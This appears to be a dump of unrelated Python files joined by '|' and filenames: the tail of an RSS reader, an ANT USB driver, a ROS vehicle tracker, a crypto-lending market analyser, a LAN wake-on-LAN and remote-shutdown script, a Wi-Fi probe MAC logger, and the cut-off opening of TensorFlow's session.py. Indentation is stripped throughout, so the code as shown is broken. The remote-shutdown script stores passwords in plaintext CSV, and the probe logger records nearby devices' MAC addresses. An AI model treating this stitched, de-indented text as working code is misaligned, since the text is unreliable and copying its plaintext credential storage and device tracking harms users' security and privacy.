# Retrieves and filters the stories from the RSS feeds
frame = Frame(master)
frame.pack(side=BOTTOM)
scrollbar = Scrollbar(master)
scrollbar.pack(side=RIGHT,fill=Y)
t = "Google & Yahoo Top News"
title = StringVar()
title.set(t)
ttl = Label(master, textvariable=title, font=("Helvetica", 18))
ttl.pack(side=TOP)
cont = Text(master, font=("Helvetica",14), yscrollcommand=scrollbar.set)
cont.pack(side=BOTTOM)
cont.tag_config("title", justify='center')
button = Button(frame, text="Exit", command=root.destroy)
button.pack(side=BOTTOM)
guidShown = []
def get_cont(newstory):
if newstory.get_guid() not in guidShown:
cont.insert(END, newstory.get_title()+"\n", "title")
cont.insert(END, "\n---------------------------------------------------------------\n", "title")
cont.insert(END, newstory.get_description())
cont.insert(END, "\n*********************************************************************\n", "title")
guidShown.append(newstory.get_guid())
while True:
print("Polling . . .", end=' ')
# Get stories from Google's Top Stories RSS news feed
stories = process("http://news.google.com/news?output=rss")
# Get stories from Yahoo's Top Stories RSS news feed
stories.extend(process("http://news.yahoo.com/rss/topstories"))
stories = filter_stories(stories, triggerlist)
list(map(get_cont, stories))
scrollbar.config(command=cont.yview)
print("Sleeping...")
time.sleep(SLEEPTIME)
except Exception as e:
print(e)
if __name__ == '__main__':
root = Tk()
root.title("Some RSS parser")
t = threading.Thread(target=main_thread, args=(root,))
t.start()
root.mainloop()
|
ant.py
|
# Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import array
import collections
import struct
import threading
import time
import Queue
import logging
import usb
from message import Message
from commons import format_list
from driver import find_driver
_logger = logging.getLogger("garmin.ant.base.ant")
class Ant():
_RESET_WAIT = 1
def __init__(self):
self._driver = find_driver()
self._message_queue_cond = threading.Condition()
self._message_queue = collections.deque()
self._events = Queue.Queue()
self._buffer = array.array('B', [])
self._burst_data = array.array('B', [])
self._last_data = array.array('B', [])
self._running = True
self._driver.open()
self._worker_thread = threading.Thread(target=self._worker, name="ant.base")
self._worker_thread.start()
self.reset_system()
def start(self):
self._main()
def stop(self):
if self._running:
_logger.debug("Stoping ant.base")
self._running = False
self._worker_thread.join()
def _on_broadcast(self, message):
self._events.put(('event', (message._data[0],
Message.Code.EVENT_RX_BROADCAST, message._data[1:])))
def _on_acknowledge(self, message):
self._events.put(('event', (message._data[0],
Message.Code.EVENT_RX_ACKNOWLEDGED, message._data[1:])))
def _on_burst_data(self, message):
sequence = message._data[0] >> 5
channel = message._data[0] & 0b00011111
data = message._data[1:]
# First sequence
if sequence == 0:
self._burst_data = data
# Other
else:
self._burst_data.extend(data)
# Last sequence (indicated by bit 3)
if sequence & 0b100 != 0:
self._events.put(('event', (channel,
Message.Code.EVENT_RX_BURST_PACKET, self._burst_data)))
def _worker(self):
_logger.debug("Ant runner started")
while self._running:
try:
message = self.read_message()
if message == None:
break
# TODO: flag and extended for broadcast, acknowledge, and burst
# Only do callbacks for new data. Resent data only indicates
# a new channel timeslot.
if not (message._id == Message.ID.BROADCAST_DATA and
message._data == self._last_data):
# Notifications
if message._id in [Message.ID.STARTUP_MESSAGE, \
Message.ID.SERIAL_ERROR_MESSAGE]:
self._events.put(('response', (None, message._id,
message._data)))
# Response (no channel)
elif message._id in [Message.ID.RESPONSE_VERSION, \
Message.ID.RESPONSE_CAPABILITIES, \
Message.ID.RESPONSE_SERIAL_NUMBER]:
self._events.put(('response', (None, message._id,
message._data)))
# Response (channel)
elif message._id in [Message.ID.RESPONSE_CHANNEL_STATUS, \
Message.ID.RESPONSE_CHANNEL_ID]:
self._events.put(('response', (message._data[0],
message._id, message._data[1:])))
# Response (other)
elif (message._id == Message.ID.RESPONSE_CHANNEL \
and message._data[1] != 0x01):
self._events.put(('response', (message._data[0],
message._data[1], message._data[2:])))
# Channel event
elif message._id == Message.ID.BROADCAST_DATA:
self._on_broadcast(message)
elif message._id == Message.ID.ACKNOWLEDGE_DATA:
self._on_acknowledge(message)
elif message._id == Message.ID.BURST_TRANSFER_DATA:
self._on_burst_data(message)
elif message._id == Message.ID.RESPONSE_CHANNEL:
_logger.debug("Got channel event, %r", message)
self._events.put(('event', (message._data[0],
message._data[1], message._data[2:])))
else:
_logger.warning("Got unknown message, %r", message)
else:
_logger.debug("No new data this period")
# Send messages in queue, on indicated time slot
if message._id == Message.ID.BROADCAST_DATA:
time.sleep(0.1)
_logger.debug("Got broadcast data, examine queue to see if we should send anything back")
if self._message_queue_cond.acquire(blocking=False):
while len(self._message_queue) > 0:
m = self._message_queue.popleft()
self.write_message(m)
_logger.debug(" - sent message from queue, %r", m)
if(m._id != Message.ID.BURST_TRANSFER_DATA or \
m._data[0] & 0b10000000):# or m._data[0] == 0):
break
else:
_logger.debug(" - no messages in queue")
self._message_queue_cond.release()
self._last_data = message._data
except usb.USBError as e:
_logger.warning("%s, %r", type(e), e.args)
_logger.debug("Ant runner stopped")
def _main(self):
while self._running:
try:
(event_type, event) = self._events.get(True, 1.0)
self._events.task_done()
(channel, event, data) = event
if event_type == 'response':
self.response_function(channel, event, data)
elif event_type == 'event':
self.channel_event_function(channel, event, data)
else:
_logger.warning("Unknown message typ '%s': %r", event_type, event)
except Queue.Empty as e:
pass
def write_message_timeslot(self, message):
with self._message_queue_cond:
self._message_queue.append(message)
def write_message(self, message):
data = message.get()
self._driver.write(data)
_logger.debug("Write data: %s", format_list(data))
def read_message(self):
while self._running:
# If we have a message in buffer already, return it
if len(self._buffer) >= 5 and len(self._buffer) >= self._buffer[1] + 4:
packet = self._buffer[:self._buffer[1] + 4]
self._buffer = self._buffer[self._buffer[1] + 4:]
return Message.parse(packet)
# Otherwise, read some data and call the function again
else:
data = self._driver.read()
self._buffer.extend(data)
if data:
_logger.debug("Read data: %s (now have %s in buffer)",
format_list(data), format_list(self._buffer))
# Ant functions
def unassign_channel(self, channel):
pass
def assign_channel(self, channel, channelType, networkNumber):
message = Message(Message.ID.ASSIGN_CHANNEL, [channel, channelType, networkNumber])
self.write_message(message)
def open_channel(self, channel):
message = Message(Message.ID.OPEN_CHANNEL, [channel])
self.write_message(message)
def set_channel_id(self, channel, deviceNum, deviceType, transmissionType):
data = array.array('B', struct.pack("<BHBB", channel, deviceNum, deviceType, transmissionType))
message = Message(Message.ID.SET_CHANNEL_ID, data)
self.write_message(message)
def set_channel_period(self, channel, messagePeriod):
data = array.array('B', struct.pack("<BH", channel, messagePeriod))
message = Message(Message.ID.SET_CHANNEL_PERIOD, data)
self.write_message(message)
def set_channel_search_timeout(self, channel, timeout):
message = Message(Message.ID.SET_CHANNEL_SEARCH_TIMEOUT, [channel, timeout])
self.write_message(message)
def set_channel_rf_freq(self, channel, rfFreq):
message = Message(Message.ID.SET_CHANNEL_RF_FREQ, [channel, rfFreq])
self.write_message(message)
def set_network_key(self, network, key):
message = Message(Message.ID.SET_NETWORK_KEY, [network] + key)
self.write_message(message)
# This function is a bit of a mystery. It is mentioned in libgant,
# http://sportwatcher.googlecode.com/svn/trunk/libgant/gant.h and is
# also sent from the official ant deamon on windows.
def set_search_waveform(self, channel, waveform):
message = Message(Message.ID.SET_SEARCH_WAVEFORM, [channel] + waveform)
self.write_message(message)
def reset_system(self):
message = Message(Message.ID.RESET_SYSTEM, [0x00])
self.write_message(message)
time.sleep(self._RESET_WAIT)
def request_message(self, channel, messageId):
message = Message(Message.ID.REQUEST_MESSAGE, [channel, messageId])
self.write_message(message)
def send_acknowledged_data(self, channel, data):
assert len(data) == 8
message = Message(Message.ID.ACKNOWLEDGE_DATA,
array.array('B', [channel]) + data)
self.write_message_timeslot(message)
def send_burst_transfer_packet(self, channel_seq, data, first):
assert len(data) == 8
message = Message(Message.ID.BURST_TRANSFER_DATA,
array.array('B', [channel_seq]) + data)
self.write_message_timeslot(message)
def send_burst_transfer(self, channel, data):
assert len(data) % 8 == 0
_logger.debug("Send burst transfer, chan %s, data %s", channel, data)
packets = len(data) / 8
for i in range(packets):
sequence = ((i - 1) % 3) + 1
if i == 0:
sequence = 0
elif i == packets - 1:
sequence = sequence | 0b100
channel_seq = channel | sequence << 5
packet_data = data[i * 8:i * 8 + 8]
_logger.debug("Send burst transfer, packet %d, seq %d, data %s", i, sequence, packet_data)
self.send_burst_transfer_packet(channel_seq, packet_data, first=i==0)
def response_function(self, channel, event, data):
pass
def channel_event_function(self, channel, event, data):
pass
|
vehicle_detection_tracking_node.py
|
#!/usr/bin/env python
import rospy
import cv2
import numpy as np
from vehicle_detection_tracking.Detector import Detector
from vehicle_detection_tracking.Tracker import Tracker
from vehicle_detection_tracking.Introducer import Introducer
from cv_bridge import CvBridge, CvBridgeError
from duckietown_msgs.msg import VehicleDetected, VehicleBoundingBox
from sensor_msgs.msg import CompressedImage, Image
from std_msgs.msg import Int32
from mutex import mutex
import threading
from duckietown_utils.jpg import image_cv_from_jpg
from time import time
class TLD():
def __init__(self):
self.introduce = False
try:
pos_dist = np.load(
"/home/ubuntu/duckietown/catkin_ws/src/vehicle_detection_tracking/distribution/posDist.npy").tolist()
neg_dist = np.load(
"/home/ubuntu/duckietown/catkin_ws/src/vehicle_detection_tracking/distribution/negDist.npy").tolist()
except IOError:
print "Object to be detected is not introduced"
self.introduce = True
self.active = True
self.bridge = CvBridge()
self.Detector = Detector()
self.Detector.set_posterior(pos_dist, neg_dist)
self.Tracker = Tracker()
self.Introducer = Introducer()
self.tracking = False
self.sub_image = rospy.Subscriber("/autopilot/camera_node/image/compressed", CompressedImage, self.cbImage,
queue_size=1)
self.pub_image = rospy.Publisher("~image_with_detection", Image, queue_size=1)
self.pub_vehicle_detected = rospy.Publisher("~vehicle_detected", VehicleDetected, queue_size=1)
self.pub_vehicle_bbox = rospy.Publisher("~vehicle_bounding_box", VehicleBoundingBox, queue_size=1)
self.lock = mutex()
self.margin = 3
cv2.namedWindow("Image", cv2.WINDOW_NORMAL)
def cbImage(self, image_msg):
try:
image_cv = image_cv_from_jpg(image_msg.data)
except ValueError as e:
print 'Could not decode image: %s' % (e)
return
if not self.active:
return
thread = threading.Thread(target=self.run, args=(image_cv,))
thread.setDaemon(True)
thread.start()
def run(self, image_cv):
if self.lock.testandset():
vehicle_bounding_box_msg = VehicleBoundingBox()
vehicle_detected_msg = VehicleDetected()
image_cv = image_cv[80:200, 0:640]
if not self.tracking:
veh = self.Detector.run(image_cv)
if veh == None:
vehicle_detected_msg = False
self.pub_vehicle_detected.publish(vehicle_detected_msg)
cv2.imshow("Image", image_cv)
cv2.waitKey(10)
else:
vehicle_detected_msg = True
vehicle_bounding_box_msg.data = veh
cv2.rectangle(image_cv, (veh[0], veh[1]), (veh[2], veh[3]), (0, 255, 0), 2)
image_msg = self.bridge.cv2_to_imgmsg(image_cv, "bgr8")
self.pub_vehicle_bbox.publish(vehicle_bounding_box_msg)
self.pub_vehicle_detected.publish(vehicle_detected_msg)
self.pub_image.publish(image_msg)
veh = [veh[0] + self.margin, veh[1] + self.margin,
veh[2] - self.margin, veh[3] - self.margin]
self.Tracker.initialize(veh, image_cv)
self.tracking = True
cv2.imshow("Image", image_cv)
cv2.waitKey(10)
else:
veh = self.Tracker.run(image_cv)
if veh == None:
rospy.loginfo("Tracking Failed")
self.tracking = False
vehicle_detected_msg = False
self.pub_vehicle_detected.publish(vehicle_detected_msg)
cv2.imshow("Image", image_cv)
cv2.waitKey(10)
else:
veh = [veh[0] - self.margin, veh[1] - self.margin,
veh[2] + self.margin, veh[3] + self.margin]
vehicle_detected_msg = True
vehicle_bounding_box_msg.data = veh
print self.cal_distance(veh)
cv2.rectangle(image_cv, (veh[0], veh[1]), (veh[2], veh[3]), (255, 0, 0), 2)
image_msg = self.bridge.cv2_to_imgmsg(image_cv, "bgr8")
self.pub_vehicle_bbox.publish(vehicle_bounding_box_msg)
self.pub_vehicle_detected.publish(vehicle_detected_msg)
self.pub_image.publish(image_msg)
cv2.imshow("Image", image_cv)
cv2.waitKey(10)
self.lock.unlock()
def cal_distance(self, bbox):
d = 14
h = 6.5
p = 120
focal_length = (d * p) / h
height = bbox[3] - bbox[1]
distance = (h * focal_length) / height
return distance
if __name__ == "__main__":
rospy.init_node("vehicle_detection_tracking_node")
vehicle_detection_tracking_node = TLD()
rospy.spin()
|
MarketAnalysis.py
|
import csv
import threading
import time
import datetime
from cStringIO import StringIO
try:
import numpy
use_numpy = True
except ImportError as ex:
ex.message = ex.message if ex.message else str(ex)
print("WARN: Module Numpy not found, using manual percentile method instead. "
"It is recommended to install Numpy. Error: {0}".format(ex.message))
use_numpy = False
currencies_to_analyse = []
open_files = {}
max_age = 0
update_interval = 0
api = None
Data = None
lending_style = 0
def init(config, api1, data1):
global currencies_to_analyse, open_files, max_age, update_interval, api, Data, lending_style
currencies_to_analyse = config.get_currencies_list('analyseCurrencies')
max_age = int(config.get('BOT', 'analyseMaxAge', 30, 1, 365))
update_interval = int(config.get('BOT', 'analyseUpdateInterval', 60, 10, 3600))
lending_style = int(config.get('BOT', 'lendingStyle', 50, 1, 99))
api = api1
Data = data1
if len(currencies_to_analyse) != 0:
for currency in currencies_to_analyse:
try:
api.api_query("returnLoanOrders", {'currency': currency, 'limit': '5'})
except Exception as cur_ex:
print "Error: You entered an incorrect currency: '" + currency + \
"' to analyse the market of, please check your settings. Error message: " + str(cur_ex)
exit(1)
else:
path = "market_data/" + currency + "_market_data.csv"
open_files[currency] = path
thread = threading.Thread(target=update_market_loop)
thread.deamon = True
thread.start()
def update_market_loop():
while True:
update_markets()
delete_old_data()
time.sleep(update_interval)
def update_markets():
for cur in open_files:
with open(open_files[cur], 'a') as f:
writer = csv.writer(f, lineterminator='\n')
raw_data = api.return_loan_orders(cur, 5)['offers'][0]
market_data = [Data.timestamp(), raw_data['rate']]
writer.writerow(market_data)
def delete_old_data():
for cur in open_files:
with open(open_files[cur], 'rb') as file_a:
new_a_buf = StringIO()
writer = csv.writer(new_a_buf)
reader2 = csv.reader(file_a)
for row in reader2:
if get_day_difference(row[0]) < max_age:
writer.writerow(row)
# At this point, the contents (new_a_buf) exist in memory
with open(open_files[cur], 'wb') as file_b:
file_b.write(new_a_buf.getvalue())
def get_day_difference(date_time): # Will be in format '%Y-%m-%d %H:%M:%S'
date1 = datetime.datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')
now = datetime.datetime.now()
diff_days = (now - date1).days
return diff_days
def get_rate_list(cur='all'):
if cur == 'all':
all_rates = {}
for cur in open_files:
with open(open_files[cur], 'r') as f:
reader = csv.reader(f)
rates = []
for row in reader:
rates.append(row[1])
rates = map(float, rates)
all_rates[cur] = rates
return all_rates
else:
if cur not in open_files:
return []
with open(open_files[cur], 'r') as f:
reader = csv.reader(f)
rates = []
for row in reader:
rates.append(row[1])
rates = map(float, rates)
return rates
def get_rate_suggestion(cur):
if cur not in open_files:
return 0
try:
rates = get_rate_list(cur)
if use_numpy:
result = numpy.percentile(rates, int(lending_style))
else:
rates.sort()
index = int(lending_style * len(rates) / 100.0)
result = rates[index]
result = Data.truncate(result, 6)
return result
except Exception as exc:
print "WARN: Exception found when analysing markets, if this happens for more than a couple minutes please " \
"make a Github issue so we can fix it. Otherwise, you can safely ignore it. Error: " + str(exc)
return 0
|
remote.py
|
import os
import sys
import re
import csv
import time
import socket
import platform
import threading
import argparse
from colorama import init as color
from subprocess import run
# Console colors
color()
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
lock = threading.Lock()
def get_host_ip():
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.connect(('172.24.255.212', 80))
ip = sock.getsockname()[0]
print(f'Your host IP is {O}{ip}{W}')
return ip
def host_status(host_ip):
proc = run(['ping', host_ip, '-n', '2'],
capture_output=True, universal_newlines=True)
if 'TTL=' in proc.stdout:
active_ips.add(host_ip)
with lock:
print(f"{G}{host_ip}{W} is {O}online{W}")
def ping_ips():
start_time = time.time()
for ip in ip_list:
t = threading.Thread(target=host_status, args=(ip,), daemon=True)
t.start()
if platform.release() != "10":
while len(threading.enumerate()) >= 128:
pass
while len(threading.enumerate()) > 1 and time.time() - start_time <= 60:
pass
def create_magic_packet(macaddress):
"""
Create a magic packet.
A magic packet is a packet that can be used with the for wake on lan
protocol to wake up a computer. The packet is constructed from the
mac address given as a parameter.
Args:
macaddress (str): the mac address that should be parsed into a
magic packet.
"""
if len(macaddress) == 17:
sep = macaddress[2]
macaddress = macaddress.replace(sep, "")
elif len(macaddress) != 12:
raise ValueError("Incorrect MAC address format")
return bytes.fromhex("F" * 12 + macaddress * 16)
def send_magic_packet(*macs, **kwargs):
"""
Wake up computers having any of the given mac addresses.
Wake on lan must be enabled on the host device.
Args:
macs (str): One or more macaddresses of machines to wake.
Keyword Args:
ip_address (str): the ip address of the host to send the magic packet
to (default "255.255.255.255")
port (int): the port of the host to send the magic packet to
(default 9)
"""
ip = kwargs.pop("ip_address", "255.255.255.255")
port = kwargs.pop("port", 9)
for k in kwargs:
raise TypeError(
"send_magic_packet() got an unexpected keyword " "argument {!r}".format(
k)
)
packets = [create_magic_packet(mac) for mac in macs]
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.connect((ip, port))
for packet in packets:
sock.send(packet)
class Host():
def __init__(self, host_mac, host_ip):
self.mac = host_mac
self.ip = host_ip
self.user = ""
self.passwd = ""
self.status = ""
self.model = ""
def remote_host(self, action=None, model=None, reverse=False):
if model:
if reverse and model.search(self.model):
return
elif not reverse and not model.search(self.model):
return
if action:
# print(f'Starting remote hosts to {O}power on{W}')
self.magic_wakeon()
else:
# print(f'Starting remote hosts to {O}power off{W}')
self.remote_shutdown()
def magic_wakeon(self):
if self.status != 'ON':
# proc = run('mc-wol %s' % self.mac, capture_output=True)
send_magic_packet(self.mac, port=8384)
print(f'Send magic packet to {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W}')
return True
# print(f"The host
# {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W} is already
# {C}power on{W}")
def remote_shutdown(self):
if self.status == 'ON':
if self.user and self.passwd:
proc = run('net use \\\\%s %s /user:%s' % (
self.ip, self.passwd, self.user), capture_output=True)
if proc.returncode != 0:
print(f'{R}Fail{W} to remote host {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W}')
return
proc = run('shutdown /m \\\\%s /s /f /t 0' %
self.ip, capture_output=True)
if proc.returncode != 0:
print(f'{R}Fail{W} to power off {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W}')
return
print(f'{G}Success{W} to power off {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W}')
self.status = 'OFF'
return True
# print(f"The host
# {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W} is
# already {C}power off{W}")
def update_hosts():
hosts = {}
if os.path.exists(csv_file):
print(f'Starting update hosts from {O}{csv_file}{W} file')
with open(csv_file) as f:
csv_reader = csv.DictReader(f)
for host in csv_reader:
hosts[host['MAC']] = Host(host['MAC'], host['IP'])
hosts[host['MAC']].user = host['USER']
hosts[host['MAC']].passwd = host['PASSWORD']
hosts[host['MAC']].model = host['MODEL']
proc = run(['arp', '-a'], capture_output=True, universal_newlines=True)
for result in proc.stdout.split('\n'):
result = result.split()
if result and result[0] in active_ips:
host_mac = result[1].replace('-', ':')
host_ip = result[0]
if host_mac not in hosts:
hosts[host_mac] = Host(host_mac, host_ip)
else:
hosts[host_mac].mac = host_mac
hosts[host_mac].ip = host_ip
hosts[host_mac].status = 'ON'
host_list = list(hosts.values())
host_list.sort(key=lambda x: int(x.ip.split('.')[-1]))
return host_list
def update_csv(host_list):
print(f'Starting update hosts to {O}{csv_file}{W} file')
with open(csv_file, 'w', newline='') as f:
csv_writer = csv.DictWriter(
f, fieldnames=['IP', 'MAC', 'USER', 'PASSWORD', 'STATUS', 'MODEL'])
csv_writer.writeheader()
for host in host_list:
csv_writer.writerow({
'MAC': host.mac,
'IP': host.ip,
'USER': host.user,
'PASSWORD': host.passwd,
'STATUS': host.status,
'MODEL': host.model
})
def arg_parser():
parser = argparse.ArgumentParser(
description='a simple script use to remote hosts to power on or off')
group1 = parser.add_mutually_exclusive_group()
group1.add_argument('-on', '--on', action='store_true',
help='使用此选项用于远程启动计算机')
group1.add_argument('-off', '--off', action='store_true',
help='使用此选项用于远程关闭计算机')
group2 = parser.add_mutually_exclusive_group()
group2.add_argument('--include', action='store', nargs='+', metavar='MODEL',
help='指定需要执行远程开关机操作的机种,可为多个机种')
group2.add_argument('--exclude', action='store', nargs='+', metavar='MODEL',
help='排除不需要执行远程开关机操作的机种,可为多个机种')
parser.add_argument(
"--mac",
metavar="MAC",
nargs="+",
help="指定需要执行远程开机的计算机MAC地址,可为多个MAC"
)
parser.add_argument(
"-i",
metavar="ip",
default="255.255.255.255",
help="The ip address of the host to send the magic packet to "
"(default 255.255.255.255)."
)
parser.add_argument(
"-p",
metavar="port",
type=int,
default=9,
help="The port of the host to send the magic packet to "
"(default 9)."
)
return parser
if __name__ == '__main__':
parser = arg_parser()
args = parser.parse_args()
# if platform.release() != "10":
# W = R = G = B = O = P = C = GR = ""
os.system('cls')
if args.mac:
send_magic_packet(*args.mac, ip_address=args.i, port=args.p)
sys.exit(f"Send magic packet to {O}{' '.join(args.mac)}{W}")
active_ips = set()
ip_header = ('.').join(get_host_ip().split('.')[0:3])
csv_file = ip_header.replace('.', '_') + '.csv'
ip_list = ['%s.%s' % (ip_header, x) for x in range(1, 255)]
try:
ping_ips()
hosts = update_hosts()
model = ""
reverse = False
if args.on:
print(f'Starting remote hosts to {O}power on{W}')
if args.include:
print(f"The select model is {O}{' '.join(args.include)}{W}")
model = re.compile('|'.join(args.include), re.I)
elif args.exclude:
print(f"The unselect model is {O}{' '.join(args.exclude)}{W}")
model = re.compile('|'.join(args.exclude), re.I)
reverse = True
for host in hosts:
host.remote_host(action=True, model=model, reverse=reverse)
elif args.off:
print(f'Starting remote hosts to {O}power off{W}')
if args.include:
print(f"The select model is {O}{' '.join(args.include)}{W}")
model = re.compile('|'.join(args.include), re.I)
elif args.exclude:
print(f"The unselect model is {O}{' '.join(args.exclude)}{W}")
model = re.compile('|'.join(args.exclude), re.I)
reverse = True
for host in hosts:
host.remote_host(model=model, reverse=reverse)
update_csv(hosts)
except KeyboardInterrupt:
sys.exit()
except Exception as e:
sys.exit(e)
|
main.py
|
import numpy as np
import matplotlib.pyplot as plt
import datetime as dt
import os
import serial
import json
from threading import Thread
from mac_vendor_lookup import MacLookup
import urllib.request as urllib2
import json
import codecs
#从串口获取到mac(RSSI不管),遍历每个mac,每个查字典,如果已有->update;如果没有->新增。
dev_dict={}
mnf_list=[]
def get_manufacture(mac_address):
global plt
try:
url = "http://macvendors.co/api/"
request = urllib2.Request(url+mac_address, headers={'User-Agent' : "API Browser"})
response = urllib2.urlopen( request )
#Fix: json object must be str, not 'bytes'
reader = codecs.getreader("utf-8")
obj = json.load(reader(response))
#return obj['result']['company']
#plt.text(5,dev_dict[mac_address]-1,obj)
mnf_list.append([mac_address,obj['result']['company']])
#print(mnf_list)
except:
#TODO:ignore macs without manufacture
mnf_list.append([mac_address,"FAILED"])
pass
def wifiinfo_handler(imac):
cHour = dt.datetime.now().strftime('%H')
cMin = dt.datetime.now().strftime('%M')
#print(currentHour,currentMinute)
#print(imac)
if(imac in dev_dict):#找出其index,画新点
#print("update:"+imac+","+dev_dict[imac])
plt.scatter(int(cHour)+int(cMin)/60, dev_dict[imac])
plt.pause(0.01)
else:#新增,画新点
index=len(dev_dict)*5
dev_dict[imac]=index
#print("addnew")
plt.scatter(int(cHour)+int(cMin)/60, dev_dict[imac])
plt.text(0.5,dev_dict[imac]-1,imac)
plt.pause(0.01)
t = Thread(target=get_manufacture,args=(imac,))
t.start()
#print(dev_dict)
#--------------------------main-----------------------------
plt.axis([0, 24, 0, 100])
plt.ion()
try:
portx="COM5"
bps=115200
timex=5
ser=serial.Serial(portx,bps,timeout=timex)
result=ser.write("I am jack".encode("gbk"))
while True:
if ser.in_waiting:
str=ser.read(ser.in_waiting ).decode("gbk")
if(str=="exit"):
break
else:
if(str[2:8]=="probes" and str[-4:-2]=="]}"):
print("blank")
continue
if(str[2:8]=="probes"):
str0=""
str0=str
elif(str[-4:-2]=="]}"):
str0=str0+str
#这里得到完整json
#os.system("cls")
#print(str0)
json_str = json.loads(str0)
#print(len(json_str['probes']))
#print(json_str['probes'][0]['address'])
#每个mac传给处理函数
print('--------------------------')
old=''
for i in range(len(json_str['probes'])):
if(json_str['probes'][i]['address'] != old and json_str['probes'][i]['rssi']>-50):#排除重复
wifiinfo_handler(json_str['probes'][i]['address'])
old=json_str['probes'][i]['address']
print(old)
else:
str0=str0+str
if(len(mnf_list)>0):
#print(mnf_list[0])
plt.text(7,dev_dict[mnf_list[0][0]]-1,mnf_list[0][1])
mnf_list.pop()
print("---------------")
ser.close()
except Exception as e:
print("---异常---:",e)
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import re
import threading
import warnings
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow as tf_session
from tensorflow.python.eager import context
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
